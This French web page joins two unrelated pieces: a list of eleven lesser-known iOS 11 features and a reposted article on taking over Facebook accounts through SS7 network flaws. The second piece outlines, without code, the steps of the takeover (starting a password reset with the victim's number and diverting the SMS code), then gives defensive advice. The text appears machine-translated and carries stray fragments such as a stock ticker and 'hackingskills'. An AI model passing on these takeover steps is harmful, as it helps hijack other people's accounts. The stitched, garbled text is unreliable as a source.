 REF.: 
 
Télécharger !

Les 11 fonctions cachées d’iOS 11

Apple a présenté la nouvelle version de son système d’exploitation pour smartphone. Plus discrètes, certaines fonctions d’iOS 11 devraient améliorer l’expérience utilisateur.

Avec iOS 11, Apple a dévoilé ses ambitions pour les prochains iPhone et iPad. Sur sa tablette, les nouveautés permettent d’avoir une expérience plus proche de celle de macOS. Concernant l’iPhone, le fabricant a braqué les projecteurs sur de nouvelles fonctions photo, ainsi que sur l’arrivée du paiement entre utilisateurs via Apple Pay. Moins mises en lumière lors de la conférence, une nuée de fonctionnalités font leur apparition. Nous avons pu en découvrir certaines en testant la bêta d’iOS 11.

1. Hébergement d’applications dans iCloud



Sur Android, il est possible de stocker des applis sur sa carte microSD. Pour économiser de l’espace de stockage, iOS 11 permet à l’utilisateur de « désactiver » les applications les moins utilisées. Celles-ci sont alors désinstallées de l’appareil et hébergées dans iCloud, tout en gardant leurs paramètres et leur historique.

2. Enregistrement de l’écran en vidéo

Jusqu’à iOS 10, enregistrer l’écran de son iPhone en vidéo nécessitait l’installation de l’application Quicktime et une connexion avec un MacBook. Cette année, Apple permet à ses clients d’enregistrer très facilement ce qu’il se passe sur leur mobile, par exemple depuis le centre de contrôle.

3. « Type to Siri »

Dans le volet « Accessibilité » - qui regorge souvent de fonctions aussi discrètes qu’intéressantes, il est désormais possible de parler à Siri par écrit. Utile pour les utilisateurs muets, ou ceux qui ne désirent pas partager leur requête dans un lieu public.

4. Nouveaux effets iMessage

Popularisés avec l’Apple Watch, les effets de messages sont aussi inutiles que sympathiques. Les derniers arrivés sont baptisés « Echo » et « Spotlight ». Le premier recopiera votre message partout sur l’écran, le second le placera sous la lumière d’un projecteur.

5. Scanner intégré

Avec de bons appareils photo, nos smartphones sont également d’excellents scanners. Plutôt que de nécessiter l’installation d’une application tierce, iOS 11 permet désormais de scanner un document, directement depuis l’application « Notes ».

6. Edition de screenshots

Comme ce que propose Samsung, la capture d’écran devient plus intelligente. A la volée, iOS 11 offre un outil d’édition qui permet de rajouter quelques notes ou de retailler l’image, avant de la partager.

7. Lecture de QR Code

Nous sommes en 2017 et Apple n’a toujours pas intégré la lecture de QR Code à son application photo. Avec iOS 11, l’erreur sera réparée pour permettre à l’iPhone de scanner ce type de code-barres.

8. Partager un réseau Wi-Fi

Invité à passer la soirée chez vous, un ami vous demande votre code Wi-Fi. Sauf que ce dernier s’étale sur 26 caractères et est caché derrière votre téléviseur. Le nouvel iOS permet à un autre appareil d’accéder au réseau local, sans le faire passer par la case mot de passe.

9. Partage de stockage iCloud



Désormais, Apple permet à ses clients de partager l’espace de stockage payant sur iCloud. Plusieurs membres d'une famille peuvent alors héberger leurs fichiers en utilisant un unique abonnement.

10. Des fonctions indépendantes pour AirPods

En tapotant sur son AirPod, on peut - entre autres - passer à la chanson suivante ou lancer Siri. Avec iOS 11, les deux écouteurs prennent leur indépendance. L’utilisateur peut assigner une fonction différente à chacun des accessoires.

11. Mode sombre

Encore difficilement accessible - il faut aller le chercher dans le menu « Accessibilité », le « Dark Mode » permet d’inverser les couleurs de certaines applications, à l’image d’iMessage dont le fond passe au noir. Un mode sombre qui prendrait tout son sens avec l’arrivée d’un iPhone équipé d’un écran Amoled.

Ne reliez pas votre numéro de téléphone aux sites de médias sociaux


Comment faire un hack au compte de Facebook en utilisant les numéros de victime

Chacun se pose une question sur la façon de hacker le compte Facebook et les gens ordinaires demandent comment sécuriser le compte Facebook, entre le piratage et la sécurité, ils sont un long chemin à parcourir!En 2016, les méthodes de Hacking sont développées et de sécurité, et Hacking Facebook compte aujourd'hui l'une des principales questions sur Internet. C'est difficile à trouver, mais les chercheurs se sont révélés en prenant le contrôle de n'importe quel compte de FACEBOOK avec seulement le numéro de téléphone de la cible et certains hackingskills.Oui, votre compte Facebook peut être piraté, quel que soit le degré de sécurité de votre mot d'ordre ou la quantité de mesures de sécurité supplémentaires que vous avez prises. Sans blague!Même lorsque les utilisateurs ont choisi des mots de passe forts et pris des mesures de sécurité supplémentaires, leurs comptes Facebook FB -0,29% ne sont pas sécurisés contre les pirates informatiques. Les pirates ayant des compétences pour exploiter le réseau SS7 peuvent pirater votre compte Facebook. Tout ce dont ils ont besoin, c'est votre numéro de téléphone.Les chercheurs de Positive Technologies, qui ont récemment montré comment ils pouvaient détourner les comptes de WhatsApp et Telegram, ont maintenant donné la démonstration du piratage de Facebook en utilisant des astuces similaires, a rapporté Forbes.Qu'est-ce que SS7?Le système de signalisation n ° 7 (SS7) est un ensemble de protocoles de signalisation de téléphonie développés en 1975, qui sert à configurer et à détruire la plupart des appels téléphoniques publics de réseau téléphonique public (RTPC). Il effectue également la traduction de numéros, la portabilité des numéros locaux, la facturation prépayée, le service de messages courts (SMS) et d'autres services de marché de masse.Qu'est ce que SS7 fait normalement?SS7 est un ensemble de protocoles permettant aux réseaux téléphoniques d'échanger les informations nécessaires pour transmettre des appels et des messages texte entre eux et pour assurer une facturation correcte. Il permet également aux utilisateurs d'un réseau de se déplacer sur un autre, par exemple lorsqu'ils voyagent dans un pays étranger.SS7 est depuis longtemps connu pour être vulnérable, malgré le cryptage le plus avancé utilisé par les réseaux cellulaires. Les défauts de conception de SS7 ont été en circulation depuis 2014 lorsque l'équipe de chercheurs de German Security Research Labs a alerté le monde.Voici comment bloquer tout compte Facebook:L'attaquant doit d'abord cliquer sur le lien "Mot de passe oublié?" Sur la page d'accueil de Facebook.com. Maintenant, lorsqu'on lui demande un numéro de téléphone ou une adresse email lié au compte cible, le piratage doit fournir le numéro de téléphone légitime.L'attaquant dévie alors les SMS contenant un code d'accès unique (OTP) sur leur propre ordinateur ou téléphone et peut se connecter au compte Facebook de la cible.Vous pouvez regarder la démonstration vidéo qui montre le hack en action.Le problème affecte tous les utilisateurs de Facebook qui ont enregistré un numéro de téléphone avec Facebook et ont autorisé Facebook Texts.Outre Facebook, le travail des chercheurs montre que tout service, y compris Gmail et Twitter, qui utilise des SMS pour vérifier ses comptes d'utilisateurs a laissé des portes ouvertes aux pirates pour cibler ses clients.Bien que les opérateurs de réseau ne parviennent pas à réparer le trou quelque temps prochain, il y a peu d'utilisateurs de téléphones intelligents qui peuvent le faire.

    
Ne reliez pas votre numéro de téléphone aux sites de médias sociaux, plutôt que de recevoir uniquement des courriels pour récupérer votre compte Facebook ou d'autres médias sociaux.
    
Utilisez l'authentification à deux facteurs qui n'utilise pas de SMS pour recevoir des codes.
    
Utilisez des applications de communication qui offrent un «cryptage de bout en bout»(comme signal) pour chiffrer vos données avant de quitter votre téléphone intelligent par rapport à la fonction d'appel standard de votre téléphone.


REF.: